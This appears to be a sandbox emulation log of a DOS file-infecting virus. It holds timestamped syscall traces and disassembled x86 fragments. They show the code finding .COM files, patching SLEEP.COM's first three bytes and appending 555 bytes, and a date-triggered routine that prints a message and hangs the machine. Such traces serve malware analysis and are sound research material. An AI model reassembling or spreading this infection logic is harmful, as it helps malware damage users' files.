2018-12-25T12:44:54.502397029Z 53 PC: 13362 | Get interrupt vector (Interrupt = '47' AKA 'Get disk transfer address')
2018-12-25T12:44:54.503561539Z 37 PC: 13383 | Set interrupt vector (Interrupt = '47' AKA 'Get disk transfer address')
2018-12-25T12:44:54.505063918Z 51 PC: 13417 | Get or set Ctrl-Break
2018-12-25T12:44:54.508032724Z 72 PC: 130ec | Allocate memory
2018-12-25T12:44:54.510532343Z 61 PC: 131b2 | Open file (Filename = '')
2018-12-25T12:44:54.517245773Z 62 PC: 131ba | Close file
2018-12-25T12:44:54.519926819Z 51 PC: 1344c | Get or set Ctrl-Break
2018-12-25T12:44:54.521541026Z 74 PC: 1197c | Reallocate memory
2018-12-25T12:44:54.523073003Z 72 PC: 11991 | Allocate memory
2018-12-25T12:44:54.525484474Z 73 PC: 119b2 | Release memory
2018-12-25T12:44:54.526943257Z 72 PC: 119bd | Allocate memory
2018-12-25T12:44:54.528670438Z 73 PC: 119df | Release memory
2018-12-25T12:44:54.530859717Z 72 PC: 119f5 | Allocate memory
2018-12-25T12:44:54.533054065Z 72 PC: 119fd | Allocate memory

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":1,"TimeBased":true,"OriginalID":15889,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:44:51.968870997Z 26 PC: 12f82 | Set disk transfer address
2018-12-25T12:44:51.970658607Z 44 PC: 12e4a | Get time 0x12e4a: cmp dh, 0
0x12e4d: je 0x12e46
0x12e4f: mov byte ptr [bp + 0x32c], dh
0x12e53: mov ah, 0x47
0x12e55: mov dl, 0
0x12e57: lea si, word ptr [bp + 0x348]
0x12e5b: int 0x21
0x12e5d: call 0x12f44
0x12e60: call 0x12f68
0x12e63: mov ah, 0x4e
0x12e65: lea dx, word ptr [bp + 0x2c9]
0x12e69: mov cx, 7
0x12e6c: int 0x21
0x12e6e: jb 0x12e7b
0x12e70: lea dx, word ptr [bp + 0x3a6]
0x12e74: call 0x12eaf
0x12e77: mov ah, 0x4f
0x12e79: jmp 0x12e6c
0x12e7b: lea dx, word ptr [bp + 0x2df]
0x12e7f: mov ah, 0x3b
2018-12-25T12:44:51.97287958Z 71 PC: 12e5d | Get current directory
2018-12-25T12:44:51.975889279Z 42 PC: 12f48 | Get date 0x12f48: cmp al, 5
0x12f4a: je 0x12f4d
0x12f4c: ret
0x12f4d: mov ah, 1
0x12f4f: mov cx, 0x2020
0x12f52: int 0x10
0x12f54: mov ah, 2
0x12f56: xor dx, dx
0x12f58: int 0x10
0x12f5a: xor ax, ax
0x12f5c: int 0x10
0x12f5e: mov ah, 9
0x12f60: lea dx, word ptr [bp + 0x26f]
0x12f64: int 0x21
0x12f66: jmp 0x12f66
0x12f68: mov ah, 0x4e
0x12f6a: lea dx, word ptr [bp + 0x2cf]
0x12f6e: mov cx, 7
0x12f71: int 0x21
0x12f73: jae 0x12f76
2018-12-25T12:44:51.978910227Z 78 PC: 12f73 | Find first file
2018-12-25T12:44:51.985034187Z 78 PC: 12e6e | Find first file
2018-12-25T12:44:51.995849165Z 67 PC: 12eb5 | Get or set file attributes
2018-12-25T12:44:52.003268637Z 67 PC: 12ec2 | Get or set file attributes
2018-12-25T12:44:52.018384192Z 61 PC: 12ec9 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:44:52.025047684Z 87 PC: 12ed1 | Get or set file date and time
2018-12-25T12:44:52.028194087Z 63 PC: 12ee4 | Read file or device (Read 3 bytes on handle 5)
2018-12-25T12:44:52.034773501Z 66 PC: 12f43 | Move file pointer
2018-12-25T12:44:52.036405162Z 64 PC: 12f15 | Write file or device (Write 3 bytes on handle 5)
2018-12-25T12:44:52.040275672Z 66 PC: 12f43 | Move file pointer (See above)
2018-12-25T12:44:52.042219532Z 64 PC: 13066 | Write file or device (Write 555 bytes on handle 5)
2018-12-25T12:44:52.05030311Z 87 PC: 12f2a | Get or set file date and time
2018-12-25T12:44:52.051825955Z 62 PC: 12f2e | Close file
2018-12-25T12:44:52.057359311Z 67 PC: 12f38 | Get or set file attributes
2018-12-25T12:44:52.087400791Z 79 PC: 12e6e | Find next file (See above)
2018-12-25T12:44:52.090247623Z 67 PC: 12eb5 | Get or set file attributes (See above)
2018-12-25T12:44:52.097356991Z 67 PC: 12ec2 | Get or set file attributes (See above)
2018-12-25T12:44:52.107998798Z 61 PC: 12ec9 | Open file (See above)
2018-12-25T12:44:52.114305707Z 87 PC: 12ed1 | Get or set file date and time (See above)
2018-12-25T12:44:52.116560127Z 63 PC: 12ee4 | Read file or device (See above)
2018-12-25T12:44:52.12457214Z 66 PC: 12f43 | Move file pointer (See above)
2018-12-25T12:44:52.126287027Z 64 PC: 12f15 | Write file or device (See above)
2018-12-25T12:44:52.131079287Z 66 PC: 12f43 | Move file pointer (See above)
2018-12-25T12:44:52.133080244Z 64 PC: 13066 | Write file or device (See above)
2018-12-25T12:44:52.141431105Z 87 PC: 12f2a | Get or set file date and time (See above)
2018-12-25T12:44:52.14361059Z 62 PC: 12f2e | Close file (See above)
2018-12-25T12:44:52.15107914Z 67 PC: 12f38 | Get or set file attributes (See above)
2018-12-25T12:44:52.16070882Z 79 PC: 12e6e | Find next file (See above)
2018-12-25T12:44:52.166201674Z 67 PC: 12eb5 | Get or set file attributes (See above)
2018-12-25T12:44:52.171695811Z 67 PC: 12ec2 | Get or set file attributes (See above)
2018-12-25T12:44:52.181776404Z 61 PC: 12ec9 | Open file (See above)
2018-12-25T12:44:52.194036212Z 87 PC: 12ed1 | Get or set file date and time (See above)
2018-12-25T12:44:52.196119113Z 63 PC: 12ee4 | Read file or device (See above)
2018-12-25T12:44:52.202785574Z 66 PC: 12f43 | Move file pointer (See above)
2018-12-25T12:44:52.204416052Z 64 PC: 12f15 | Write file or device (See above)
2018-12-25T12:44:52.207845372Z 66 PC: 12f43 | Move file pointer (See above)
2018-12-25T12:44:52.209716194Z 64 PC: 13066 | Write file or device (See above)
2018-12-25T12:44:52.21771283Z 87 PC: 12f2a | Get or set file date and time (See above)
2018-12-25T12:44:52.220412513Z 62 PC: 12f2e | Close file (See above)
2018-12-25T12:44:52.235027445Z 67 PC: 12f38 | Get or set file attributes (See above)
2018-12-25T12:44:52.251196058Z 79 PC: 12e6e | Find next file (See above)
2018-12-25T12:44:52.254735889Z 67 PC: 12eb5 | Get or set file attributes (See above)
2018-12-25T12:44:52.261528332Z 67 PC: 12ec2 | Get or set file attributes (See above)
2018-12-25T12:44:52.271908765Z 61 PC: 12ec9 | Open file (See above)
2018-12-25T12:44:52.279543785Z 87 PC: 12ed1 | Get or set file date and time (See above)
2018-12-25T12:44:52.281563263Z 63 PC: 12ee4 | Read file or device (See above)
2018-12-25T12:44:52.288440679Z 66 PC: 12f43 | Move file pointer (See above)
2018-12-25T12:44:52.290018297Z 64 PC: 12f15 | Write file or device (See above)
2018-12-25T12:44:52.293438904Z 66 PC: 12f43 | Move file pointer (See above)
2018-12-25T12:44:52.295414476Z 64 PC: 13066 | Write file or device (See above)
2018-12-25T12:44:52.303608848Z 87 PC: 12f2a | Get or set file date and time (See above)
2018-12-25T12:44:52.306402993Z 62 PC: 12f2e | Close file (See above)
2018-12-25T12:44:52.3141457Z 67 PC: 12f38 | Get or set file attributes (See above)
2018-12-25T12:44:52.324089071Z 79 PC: 12e6e | Find next file (See above)
2018-12-25T12:44:52.328311763Z 67 PC: 12eb5 | Get or set file attributes (See above)
2018-12-25T12:44:52.334170874Z 67 PC: 12ec2 | Get or set file attributes (See above)
2018-12-25T12:44:52.347535835Z 61 PC: 12ec9 | Open file (See above)
2018-12-25T12:44:52.355122241Z 87 PC: 12ed1 | Get or set file date and time (See above)
2018-12-25T12:44:52.356851925Z 63 PC: 12ee4 | Read file or device (See above)
2018-12-25T12:44:52.363373425Z 66 PC: 12f43 | Move file pointer (See above)
2018-12-25T12:44:52.365558756Z 64 PC: 12f15 | Write file or device (See above)
2018-12-25T12:44:52.368363333Z 66 PC: 12f43 | Move file pointer (See above)
2018-12-25T12:44:52.37023128Z 64 PC: 13066 | Write file or device (See above)
2018-12-25T12:44:52.379004807Z 87 PC: 12f2a | Get or set file date and time (See above)
2018-12-25T12:44:52.380674656Z 62 PC: 12f2e | Close file (See above)
2018-12-25T12:44:52.388343425Z 67 PC: 12f38 | Get or set file attributes (See above)
2018-12-25T12:44:52.399275319Z 79 PC: 12e6e | Find next file (See above)
2018-12-25T12:44:52.402153033Z 67 PC: 12eb5 | Get or set file attributes (See above)
2018-12-25T12:44:52.407722641Z 67 PC: 12ec2 | Get or set file attributes (See above)
2018-12-25T12:44:52.417741588Z 61 PC: 12ec9 | Open file (See above)
2018-12-25T12:44:52.424201362Z 87 PC: 12ed1 | Get or set file date and time (See above)
2018-12-25T12:44:52.425692914Z 63 PC: 12ee4 | Read file or device (See above)
2018-12-25T12:44:52.432292207Z 66 PC: 12f43 | Move file pointer (See above)
2018-12-25T12:44:52.433585882Z 64 PC: 12f15 | Write file or device (See above)
2018-12-25T12:44:52.43608937Z 66 PC: 12f43 | Move file pointer (See above)
2018-12-25T12:44:52.438835507Z 64 PC: 13066 | Write file or device (See above)
2018-12-25T12:44:52.448003109Z 87 PC: 12f2a | Get or set file date and time (See above)
2018-12-25T12:44:52.449858496Z 62 PC: 12f2e | Close file (See above)
2018-12-25T12:44:52.458533182Z 67 PC: 12f38 | Get or set file attributes (See above)
2018-12-25T12:44:52.46863847Z 79 PC: 12e6e | Find next file (See above)
2018-12-25T12:44:52.471562421Z 67 PC: 12eb5 | Get or set file attributes (See above)
2018-12-25T12:44:52.477730637Z 67 PC: 12ec2 | Get or set file attributes (See above)
2018-12-25T12:44:52.494745718Z 61 PC: 12ec9 | Open file (See above)
2018-12-25T12:44:52.50489668Z 87 PC: 12ed1 | Get or set file date and time (See above)
2018-12-25T12:44:52.50712962Z 63 PC: 12ee4 | Read file or device (See above)
2018-12-25T12:44:52.513549574Z 66 PC: 12f43 | Move file pointer (See above)
2018-12-25T12:44:52.514976612Z 64 PC: 12f15 | Write file or device (See above)
2018-12-25T12:44:52.518720524Z 66 PC: 12f43 | Move file pointer (See above)
2018-12-25T12:44:52.521553079Z 64 PC: 13066 | Write file or device (See above)
2018-12-25T12:44:52.530173335Z 87 PC: 12f2a | Get or set file date and time (See above)
2018-12-25T12:44:52.532616305Z 62 PC: 12f2e | Close file (See above)
2018-12-25T12:44:52.540088258Z 67 PC: 12f38 | Get or set file attributes (See above)
2018-12-25T12:44:52.54940081Z 79 PC: 12e6e | Find next file (See above)
2018-12-25T12:44:52.553444594Z 67 PC: 12eb5 | Get or set file attributes (See above)
2018-12-25T12:44:52.559034401Z 67 PC: 12ec2 | Get or set file attributes (See above)
2018-12-25T12:44:52.569164123Z 61 PC: 12ec9 | Open file (See above)
2018-12-25T12:44:52.580507797Z 87 PC: 12ed1 | Get or set file date and time (See above)
2018-12-25T12:44:52.582764436Z 63 PC: 12ee4 | Read file or device (See above)
2018-12-25T12:44:52.589874154Z 87 PC: 12f2a | Get or set file date and time (See above)
2018-12-25T12:44:52.591912392Z 62 PC: 12f2e | Close file (See above)
2018-12-25T12:44:52.597742928Z 67 PC: 12f38 | Get or set file attributes (See above)
2018-12-25T12:44:52.605766538Z 79 PC: 12e6e | Find next file (See above)
2018-12-25T12:44:52.607715512Z 59 PC: 12e83 | Change current directory
2018-12-25T12:44:52.612837407Z 59 PC: 12e8d | Change current directory
2018-12-25T12:44:52.615056359Z 26 PC: 12f82 | Set disk transfer address (See above)

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":1,"TimeBased":true,"OriginalID":15889,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:44:52.020042594Z 26 PC: 12f82 | Set disk transfer address
2018-12-25T12:44:52.021391906Z 44 PC: 12e4a | Get time 0x12e4a: cmp dh, 0
0x12e4d: je 0x12e46
0x12e4f: mov byte ptr [bp + 0x32c], dh
0x12e53: mov ah, 0x47
0x12e55: mov dl, 0
0x12e57: lea si, word ptr [bp + 0x348]
0x12e5b: int 0x21
0x12e5d: call 0x12f44
0x12e60: call 0x12f68
0x12e63: mov ah, 0x4e
0x12e65: lea dx, word ptr [bp + 0x2c9]
0x12e69: mov cx, 7
0x12e6c: int 0x21
0x12e6e: jb 0x12e7b
0x12e70: lea dx, word ptr [bp + 0x3a6]
0x12e74: call 0x12eaf
0x12e77: mov ah, 0x4f
0x12e79: jmp 0x12e6c
0x12e7b: lea dx, word ptr [bp + 0x2df]
0x12e7f: mov ah, 0x3b
2018-12-25T12:44:52.023925486Z 71 PC: 12e5d | Get current directory
2018-12-25T12:44:52.027082945Z 42 PC: 12f48 | Get date 0x12f48: cmp al, 5
0x12f4a: je 0x12f4d
0x12f4c: ret
0x12f4d: mov ah, 1
0x12f4f: mov cx, 0x2020
0x12f52: int 0x10
0x12f54: mov ah, 2
0x12f56: xor dx, dx
0x12f58: int 0x10
0x12f5a: xor ax, ax
0x12f5c: int 0x10
0x12f5e: mov ah, 9
0x12f60: lea dx, word ptr [bp + 0x26f]
0x12f64: int 0x21
0x12f66: jmp 0x12f66
0x12f68: mov ah, 0x4e
0x12f6a: lea dx, word ptr [bp + 0x2cf]
0x12f6e: mov cx, 7
0x12f71: int 0x21
0x12f73: jae 0x12f76
2018-12-25T12:44:52.029846933Z 78 PC: 12f73 | Find first file
2018-12-25T12:44:52.037608867Z 78 PC: 12e6e | Find first file
2018-12-25T12:44:52.049560526Z 67 PC: 12eb5 | Get or set file attributes
2018-12-25T12:44:52.062072207Z 67 PC: 12ec2 | Get or set file attributes
2018-12-25T12:44:52.08083253Z 61 PC: 12ec9 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:44:52.088111603Z 87 PC: 12ed1 | Get or set file date and time
2018-12-25T12:44:52.089555579Z 63 PC: 12ee4 | Read file or device (Read 3 bytes on handle 5)
2018-12-25T12:44:52.095857006Z 66 PC: 12f43 | Move file pointer
2018-12-25T12:44:52.097147595Z 64 PC: 12f15 | Write file or device (Write 3 bytes on handle 5)
2018-12-25T12:44:52.099905458Z 66 PC: 12f43 | Move file pointer (See above)
2018-12-25T12:44:52.102080441Z 64 PC: 13066 | Write file or device (Write 555 bytes on handle 5)
2018-12-25T12:44:52.116139737Z 87 PC: 12f2a | Get or set file date and time
2018-12-25T12:44:52.117335264Z 62 PC: 12f2e | Close file
2018-12-25T12:44:52.122616598Z 67 PC: 12f38 | Get or set file attributes
2018-12-25T12:44:52.130310442Z 79 PC: 12e6e | Find next file (See above)
2018-12-25T12:44:52.132645791Z 67 PC: 12eb5 | Get or set file attributes (See above)
2018-12-25T12:44:52.145611683Z 67 PC: 12ec2 | Get or set file attributes (See above)
2018-12-25T12:44:52.157733152Z 61 PC: 12ec9 | Open file (See above)
2018-12-25T12:44:52.165081991Z 87 PC: 12ed1 | Get or set file date and time (See above)
2018-12-25T12:44:52.166342234Z 63 PC: 12ee4 | Read file or device (See above)
2018-12-25T12:44:52.175624299Z 66 PC: 12f43 | Move file pointer (See above)
2018-12-25T12:44:52.177583155Z 64 PC: 12f15 | Write file or device (See above)
2018-12-25T12:44:52.180636756Z 66 PC: 12f43 | Move file pointer (See above)
2018-12-25T12:44:52.188162353Z 64 PC: 13066 | Write file or device (See above)
2018-12-25T12:44:52.197359472Z 87 PC: 12f2a | Get or set file date and time (See above)
2018-12-25T12:44:52.19897419Z 62 PC: 12f2e | Close file (See above)
2018-12-25T12:44:52.214279798Z 67 PC: 12f38 | Get or set file attributes (See above)
2018-12-25T12:44:52.229248019Z 79 PC: 12e6e | Find next file (See above)
2018-12-25T12:44:52.232190308Z 67 PC: 12eb5 | Get or set file attributes (See above)
2018-12-25T12:44:52.239413002Z 67 PC: 12ec2 | Get or set file attributes (See above)
2018-12-25T12:44:52.250195417Z 61 PC: 12ec9 | Open file (See above)
2018-12-25T12:44:52.257503502Z 87 PC: 12ed1 | Get or set file date and time (See above)
2018-12-25T12:44:52.258946571Z 63 PC: 12ee4 | Read file or device (See above)
2018-12-25T12:44:52.266138993Z 66 PC: 12f43 | Move file pointer (See above)
2018-12-25T12:44:52.267514515Z 64 PC: 12f15 | Write file or device (See above)
2018-12-25T12:44:52.270260355Z 66 PC: 12f43 | Move file pointer (See above)
2018-12-25T12:44:52.272415717Z 64 PC: 13066 | Write file or device (See above)
2018-12-25T12:44:52.281445209Z 87 PC: 12f2a | Get or set file date and time (See above)
2018-12-25T12:44:52.28308961Z 62 PC: 12f2e | Close file (See above)
2018-12-25T12:44:52.292191551Z 67 PC: 12f38 | Get or set file attributes (See above)
2018-12-25T12:44:52.299018363Z 79 PC: 12e6e | Find next file (See above)
2018-12-25T12:44:52.301166684Z 67 PC: 12eb5 | Get or set file attributes (See above)
2018-12-25T12:44:52.308957834Z 67 PC: 12ec2 | Get or set file attributes (See above)
2018-12-25T12:44:52.319638516Z 61 PC: 12ec9 | Open file (See above)
2018-12-25T12:44:52.327154911Z 87 PC: 12ed1 | Get or set file date and time (See above)
2018-12-25T12:44:52.329750351Z 63 PC: 12ee4 | Read file or device (See above)
2018-12-25T12:44:52.33646244Z 66 PC: 12f43 | Move file pointer (See above)
2018-12-25T12:44:52.338068084Z 64 PC: 12f15 | Write file or device (See above)
2018-12-25T12:44:52.34163013Z 66 PC: 12f43 | Move file pointer (See above)
2018-12-25T12:44:52.343624388Z 64 PC: 13066 | Write file or device (See above)
2018-12-25T12:44:52.352746373Z 87 PC: 12f2a | Get or set file date and time (See above)
2018-12-25T12:44:52.354403343Z 62 PC: 12f2e | Close file (See above)
2018-12-25T12:44:52.363716853Z 67 PC: 12f38 | Get or set file attributes (See above)
2018-12-25T12:44:52.374522661Z 79 PC: 12e6e | Find next file (See above)
2018-12-25T12:44:52.377707267Z 67 PC: 12eb5 | Get or set file attributes (See above)
2018-12-25T12:44:52.385288281Z 67 PC: 12ec2 | Get or set file attributes (See above)
2018-12-25T12:44:52.395681574Z 61 PC: 12ec9 | Open file (See above)
2018-12-25T12:44:52.407993662Z 87 PC: 12ed1 | Get or set file date and time (See above)
2018-12-25T12:44:52.410150631Z 63 PC: 12ee4 | Read file or device (See above)
2018-12-25T12:44:52.417427768Z 66 PC: 12f43 | Move file pointer (See above)
2018-12-25T12:44:52.418975705Z 64 PC: 12f15 | Write file or device (See above)
2018-12-25T12:44:52.423349484Z 66 PC: 12f43 | Move file pointer (See above)
2018-12-25T12:44:52.425353635Z 64 PC: 13066 | Write file or device (See above)
2018-12-25T12:44:52.433986849Z 87 PC: 12f2a | Get or set file date and time (See above)
2018-12-25T12:44:52.435765156Z 62 PC: 12f2e | Close file (See above)
2018-12-25T12:44:52.445222276Z 67 PC: 12f38 | Get or set file attributes (See above)
2018-12-25T12:44:52.45668325Z 79 PC: 12e6e | Find next file (See above)
2018-12-25T12:44:52.459641146Z 67 PC: 12eb5 | Get or set file attributes (See above)
2018-12-25T12:44:52.466353031Z 67 PC: 12ec2 | Get or set file attributes (See above)
2018-12-25T12:44:52.477679527Z 61 PC: 12ec9 | Open file (See above)
2018-12-25T12:44:52.485046708Z 87 PC: 12ed1 | Get or set file date and time (See above)
2018-12-25T12:44:52.487419486Z 63 PC: 12ee4 | Read file or device (See above)
2018-12-25T12:44:52.494785898Z 66 PC: 12f43 | Move file pointer (See above)
2018-12-25T12:44:52.496685108Z 64 PC: 12f15 | Write file or device (See above)
2018-12-25T12:44:52.500818396Z 66 PC: 12f43 | Move file pointer (See above)
2018-12-25T12:44:52.502832031Z 64 PC: 13066 | Write file or device (See above)
2018-12-25T12:44:52.512418035Z 87 PC: 12f2a | Get or set file date and time (See above)
2018-12-25T12:44:52.514551103Z 62 PC: 12f2e | Close file (See above)
2018-12-25T12:44:52.522738885Z 67 PC: 12f38 | Get or set file attributes (See above)
2018-12-25T12:44:52.533480407Z 79 PC: 12e6e | Find next file (See above)
2018-12-25T12:44:52.537362671Z 67 PC: 12eb5 | Get or set file attributes (See above)
2018-12-25T12:44:52.544075999Z 67 PC: 12ec2 | Get or set file attributes (See above)
2018-12-25T12:44:52.554265937Z 61 PC: 12ec9 | Open file (See above)
2018-12-25T12:44:52.561801799Z 87 PC: 12ed1 | Get or set file date and time (See above)
2018-12-25T12:44:52.564137358Z 63 PC: 12ee4 | Read file or device (See above)
2018-12-25T12:44:52.571403701Z 66 PC: 12f43 | Move file pointer (See above)
2018-12-25T12:44:52.573055612Z 64 PC: 12f15 | Write file or device (See above)
2018-12-25T12:44:52.576906525Z 66 PC: 12f43 | Move file pointer (See above)
2018-12-25T12:44:52.578677846Z 64 PC: 13066 | Write file or device (See above)
2018-12-25T12:44:52.587275294Z 87 PC: 12f2a | Get or set file date and time (See above)
2018-12-25T12:44:52.589582889Z 62 PC: 12f2e | Close file (See above)
2018-12-25T12:44:52.597873637Z 67 PC: 12f38 | Get or set file attributes (See above)
2018-12-25T12:44:52.609212578Z 79 PC: 12e6e | Find next file (See above)
2018-12-25T12:44:52.612638479Z 67 PC: 12eb5 | Get or set file attributes (See above)
2018-12-25T12:44:52.618891815Z 67 PC: 12ec2 | Get or set file attributes (See above)
2018-12-25T12:44:52.629172719Z 61 PC: 12ec9 | Open file (See above)
2018-12-25T12:44:52.636807924Z 87 PC: 12ed1 | Get or set file date and time (See above)
2018-12-25T12:44:52.638397246Z 63 PC: 12ee4 | Read file or device (See above)
2018-12-25T12:44:52.645369469Z 87 PC: 12f2a | Get or set file date and time (See above)
2018-12-25T12:44:52.647686829Z 62 PC: 12f2e | Close file (See above)
2018-12-25T12:44:52.655723634Z 67 PC: 12f38 | Get or set file attributes (See above)
2018-12-25T12:44:52.670076405Z 79 PC: 12e6e | Find next file (See above)
2018-12-25T12:44:52.673318664Z 59 PC: 12e83 | Change current directory
2018-12-25T12:44:52.678464194Z 59 PC: 12e8d | Change current directory
2018-12-25T12:44:52.680801095Z 26 PC: 12f82 | Set disk transfer address (See above)

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":1,"TimeBased":true,"OriginalID":15889,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:44:52.076952322Z 26 PC: 12f82 | Set disk transfer address
2018-12-25T12:44:52.078679275Z 44 PC: 12e4a | Get time 0x12e4a: cmp dh, 0
0x12e4d: je 0x12e46
0x12e4f: mov byte ptr [bp + 0x32c], dh
0x12e53: mov ah, 0x47
0x12e55: mov dl, 0
0x12e57: lea si, word ptr [bp + 0x348]
0x12e5b: int 0x21
0x12e5d: call 0x12f44
0x12e60: call 0x12f68
0x12e63: mov ah, 0x4e
0x12e65: lea dx, word ptr [bp + 0x2c9]
0x12e69: mov cx, 7
0x12e6c: int 0x21
0x12e6e: jb 0x12e7b
0x12e70: lea dx, word ptr [bp + 0x3a6]
0x12e74: call 0x12eaf
0x12e77: mov ah, 0x4f
0x12e79: jmp 0x12e6c
0x12e7b: lea dx, word ptr [bp + 0x2df]
0x12e7f: mov ah, 0x3b
2018-12-25T12:44:52.08087459Z 71 PC: 12e5d | Get current directory
2018-12-25T12:44:52.082985729Z 42 PC: 12f48 | Get date 0x12f48: cmp al, 5
0x12f4a: je 0x12f4d
0x12f4c: ret
0x12f4d: mov ah, 1
0x12f4f: mov cx, 0x2020
0x12f52: int 0x10
0x12f54: mov ah, 2
0x12f56: xor dx, dx
0x12f58: int 0x10
0x12f5a: xor ax, ax
0x12f5c: int 0x10
0x12f5e: mov ah, 9
0x12f60: lea dx, word ptr [bp + 0x26f]
0x12f64: int 0x21
0x12f66: jmp 0x12f66
0x12f68: mov ah, 0x4e
0x12f6a: lea dx, word ptr [bp + 0x2cf]
0x12f6e: mov cx, 7
0x12f71: int 0x21
0x12f73: jae 0x12f76
2018-12-25T12:44:52.085231536Z 78 PC: 12f73 | Find first file
2018-12-25T12:44:52.092514319Z 78 PC: 12e6e | Find first file
2018-12-25T12:44:52.098761144Z 67 PC: 12eb5 | Get or set file attributes
2018-12-25T12:44:52.104870862Z 67 PC: 12ec2 | Get or set file attributes
2018-12-25T12:44:52.122956268Z 61 PC: 12ec9 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:44:52.131306797Z 87 PC: 12ed1 | Get or set file date and time
2018-12-25T12:44:52.133143129Z 63 PC: 12ee4 | Read file or device (Read 3 bytes on handle 5)
2018-12-25T12:44:52.142342528Z 66 PC: 12f43 | Move file pointer
2018-12-25T12:44:52.147885576Z 64 PC: 12f15 | Write file or device (Write 3 bytes on handle 5)
2018-12-25T12:44:52.1511585Z 66 PC: 12f43 | Move file pointer (See above)
2018-12-25T12:44:52.153894305Z 64 PC: 13066 | Write file or device (Write 555 bytes on handle 5)
2018-12-25T12:44:52.163323227Z 87 PC: 12f2a | Get or set file date and time
2018-12-25T12:44:52.165265759Z 62 PC: 12f2e | Close file
2018-12-25T12:44:52.174700472Z 67 PC: 12f38 | Get or set file attributes
2018-12-25T12:44:52.186029467Z 79 PC: 12e6e | Find next file (See above)
2018-12-25T12:44:52.188848444Z 67 PC: 12eb5 | Get or set file attributes (See above)
2018-12-25T12:44:52.195120437Z 67 PC: 12ec2 | Get or set file attributes (See above)
2018-12-25T12:44:52.205905142Z 61 PC: 12ec9 | Open file (See above)
2018-12-25T12:44:52.218864724Z 87 PC: 12ed1 | Get or set file date and time (See above)
2018-12-25T12:44:52.220756995Z 63 PC: 12ee4 | Read file or device (See above)
2018-12-25T12:44:52.228905446Z 66 PC: 12f43 | Move file pointer (See above)
2018-12-25T12:44:52.2330981Z 64 PC: 12f15 | Write file or device (See above)
2018-12-25T12:44:52.235842905Z 66 PC: 12f43 | Move file pointer (See above)
2018-12-25T12:44:52.240031314Z 64 PC: 13066 | Write file or device (See above)
2018-12-25T12:44:52.249081664Z 87 PC: 12f2a | Get or set file date and time (See above)
2018-12-25T12:44:52.250718672Z 62 PC: 12f2e | Close file (See above)
2018-12-25T12:44:52.264067435Z 67 PC: 12f38 | Get or set file attributes (See above)
2018-12-25T12:44:52.273725611Z 79 PC: 12e6e | Find next file (See above)
2018-12-25T12:44:52.275816469Z 67 PC: 12eb5 | Get or set file attributes (See above)
2018-12-25T12:44:52.280264493Z 67 PC: 12ec2 | Get or set file attributes (See above)
2018-12-25T12:44:52.290467864Z 61 PC: 12ec9 | Open file (See above)
2018-12-25T12:44:52.298430419Z 87 PC: 12ed1 | Get or set file date and time (See above)
2018-12-25T12:44:52.301152228Z 63 PC: 12ee4 | Read file or device (See above)
2018-12-25T12:44:52.309027873Z 66 PC: 12f43 | Move file pointer (See above)
2018-12-25T12:44:52.310568313Z 64 PC: 12f15 | Write file or device (See above)
2018-12-25T12:44:52.314383037Z 66 PC: 12f43 | Move file pointer (See above)
2018-12-25T12:44:52.316476984Z 64 PC: 13066 | Write file or device (See above)
2018-12-25T12:44:52.325270215Z 87 PC: 12f2a | Get or set file date and time (See above)
2018-12-25T12:44:52.326798156Z 62 PC: 12f2e | Close file (See above)
2018-12-25T12:44:52.335384115Z 67 PC: 12f38 | Get or set file attributes (See above)
2018-12-25T12:44:52.34637122Z 79 PC: 12e6e | Find next file (See above)
2018-12-25T12:44:52.349383963Z 67 PC: 12eb5 | Get or set file attributes (See above)
2018-12-25T12:44:52.356407437Z 67 PC: 12ec2 | Get or set file attributes (See above)
2018-12-25T12:44:52.368006683Z 61 PC: 12ec9 | Open file (See above)
2018-12-25T12:44:52.375743375Z 87 PC: 12ed1 | Get or set file date and time (See above)
2018-12-25T12:44:52.377757104Z 63 PC: 12ee4 | Read file or device (See above)
2018-12-25T12:44:52.386002566Z 66 PC: 12f43 | Move file pointer (See above)
2018-12-25T12:44:52.388059424Z 64 PC: 12f15 | Write file or device (See above)
2018-12-25T12:44:52.39204154Z 66 PC: 12f43 | Move file pointer (See above)
2018-12-25T12:44:52.394311013Z 64 PC: 13066 | Write file or device (See above)
2018-12-25T12:44:52.403351087Z 87 PC: 12f2a | Get or set file date and time (See above)
2018-12-25T12:44:52.405903906Z 62 PC: 12f2e | Close file (See above)
2018-12-25T12:44:52.414683822Z 67 PC: 12f38 | Get or set file attributes (See above)
2018-12-25T12:44:52.426370398Z 79 PC: 12e6e | Find next file (See above)
2018-12-25T12:44:52.430264616Z 67 PC: 12eb5 | Get or set file attributes (See above)
2018-12-25T12:44:52.436589471Z 67 PC: 12ec2 | Get or set file attributes (See above)
2018-12-25T12:44:52.447842882Z 61 PC: 12ec9 | Open file (See above)
2018-12-25T12:44:52.455405243Z 87 PC: 12ed1 | Get or set file date and time (See above)
2018-12-25T12:44:52.457337826Z 63 PC: 12ee4 | Read file or device (See above)
2018-12-25T12:44:52.464826304Z 66 PC: 12f43 | Move file pointer (See above)
2018-12-25T12:44:52.466594417Z 64 PC: 12f15 | Write file or device (See above)
2018-12-25T12:44:52.469785044Z 66 PC: 12f43 | Move file pointer (See above)
2018-12-25T12:44:52.471607015Z 64 PC: 13066 | Write file or device (See above)
2018-12-25T12:44:52.480436526Z 87 PC: 12f2a | Get or set file date and time (See above)
2018-12-25T12:44:52.482946909Z 62 PC: 12f2e | Close file (See above)
2018-12-25T12:44:52.492055307Z 67 PC: 12f38 | Get or set file attributes (See above)
2018-12-25T12:44:52.504639227Z 79 PC: 12e6e | Find next file (See above)
2018-12-25T12:44:52.508796251Z 67 PC: 12eb5 | Get or set file attributes (See above)
2018-12-25T12:44:52.515714153Z 67 PC: 12ec2 | Get or set file attributes (See above)
2018-12-25T12:44:52.526474639Z 61 PC: 12ec9 | Open file (See above)
2018-12-25T12:44:52.53477568Z 87 PC: 12ed1 | Get or set file date and time (See above)
2018-12-25T12:44:52.536436259Z 63 PC: 12ee4 | Read file or device (See above)
